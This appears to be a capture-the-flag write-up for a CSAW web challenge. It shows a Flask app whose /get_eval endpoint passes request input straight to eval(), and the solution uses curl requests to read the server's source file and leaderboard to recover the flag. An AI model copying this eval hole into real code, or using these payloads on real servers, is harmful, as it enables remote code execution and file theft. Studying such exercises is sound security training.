Playing on the Backcourts
Challenge
yadayada playing tennis like pong yadayada someone’s cheating yadayada at least the leaderboard is safe!
— smallfoot
from flask import Flask, render_template, request, session, jsonify, send_filefrom hashlib import sha256from os import path as path
app = Flask(__name__)app.secret_key = 'safe'
leaderboard_path = 'leaderboard.txt'safetytime = 'csawctf{i_look_different_in_prod}'
@app.route('/')def index() -> str: cookie = request.cookies.get('session')
if cookie: token = cookie.encode('utf-8') tokenHash = sha256(token).hexdigest()
if tokenHash == '25971dadcb50db2303d6a68de14ae4f2d7eb8449ef9b3818bd3fafd052735f3b': try: with open(leaderboard_path, 'r') as file: lbdata = file.read()
except FileNotFoundError: lbdata = 'Leaderboard file not found'
except Exception as e: lbdata = f'Error: {str(e)}'
return '<br>'.join(lbdata.split('\n'))
open('logs.txt', mode='w').close() return render_template("index.html")
@app.route('/report')def report() -> str: return render_template("report.html")
@app.route('/clear_logs', methods=['POST'])def clear_logs() -> Flask.response_class: try: open('logs.txt', 'w').close()
return jsonify(status='success')
except Exception as e: return jsonify(status='error', reason=str(e))
@app.route('/submit_logs', methods=['POST'])def submit_logs() -> Flask.response_class: try: logs = request.json
with open('logs.txt', 'a') as logFile: for log in logs: logFile.write(f"{log['player']} pressed {log['key']}\n")
return jsonify(status='success')
except Exception as e: return jsonify(status='error', reason=str(e))
@app.route('/get_logs', methods=['GET'])def get_logs() -> Flask.response_class: try: if path.exists('logs.txt'): return send_file('logs.txt', as_attachment=False) else: return jsonify(status='error', reason='Log file not found'), 404
except Exception as e: return jsonify(status='error', reason=str(e))
@app.route('/get_moves', methods=['POST'])def eval_moves() -> Flask.response_class: try: data = request.json reported_player = data['playerName'] moves = '' if path.exists('logs.txt'): with open('logs.txt', 'r') as file: lines = file.readlines()
for line in lines: if line.strip(): player, key = line.split(' pressed ') if player.strip() == reported_player: moves += key.strip()
return jsonify(status='success', result=moves)
except Exception as e: return jsonify(status='error', reason=str(e))
@app.route('/get_eval', methods=['POST'])def get_eval() -> Flask.response_class: try: data = request.json expr = data['expr']
return jsonify(status='success', result=deep_eval(expr))
except Exception as e: return jsonify(status='error', reason=str(e))
def deep_eval(expr:str) -> str: try: nexpr = eval(expr) except Exception as e: return expr
return deep_eval(nexpr)
if __name__ == '__main__': app.run(host='0.0.0.0')
Solution
Reading through app_public.py,
safetytime = 'csawctf{i_look_different_in_prod}'
and the /get_eval
route
stand out.
# ...@app.route('/get_eval', methods=['POST'])def get_eval() -> Flask.response_class: try: data = request.json expr = data['expr']
return jsonify(status='success', result=deep_eval(expr))
except Exception as e: return jsonify(status='error', reason=str(e))
def deep_eval(expr:str) -> str: try: nexpr = eval(expr) except Exception as e: return expr
return deep_eval(nexpr)# ...
You should never use exec
or eval
, especially when the input comes from an
untrusted source (e.g. a POST request).
But because they did, we can curl the endpoint with our code.
curl -X POST -d '{"expr":"safetytime"}' -H "Content-Type: application/json" https://backcourts.ctf.csaw.io/get_eval{"result":"csawctf{7h1s_1S_n07_7h3_FL49_y0u_4R3_l00K1n9_f0R}","status":"success"}
Well, it could be the key, but it seems to be a distraction.
However, we have code execution. Lets see the actual file that is in production.
curl -X POST -d '{"expr":"open(__file__).read()"}' -H "Content-Type: application/json" https://backcourts.ctf.csaw.io/get_eval
# ...leaderboard_path = 'leaderboard.txt'safetytime = 'csawctf{7h1s_1S_n07_7h3_FL49_y0u_4R3_l00K1n9_f0R}'# ...
My next guess was to read the leaderboard.txt
curl -X POST -d '{"expr":"open(leaderboard_path).read()"}' -H "Content-Type: application/json" https://backcourts.ctf.csaw.io/get_eval{"result":"1.kainzow \n2.wozniak \n3.beastmaster64 \n4.m4y4 \n5.smallfoot \n6.BBLDrizzy \n7.\u00af\\_(\u30c4)_/\u00af \n8.dvorak\n9.csawctf{5H1774K3_Mu5Hr00M5_1_fuX0R3d_Up_50n_0F_4_81207CH}\n10.funGuyQiu \n11.bidenJoe","status":"success"}
There it is
csawctf{5H1774K3_Mu5Hr00M5_1_fuX0R3d_Up_50n_0F_4_81207CH}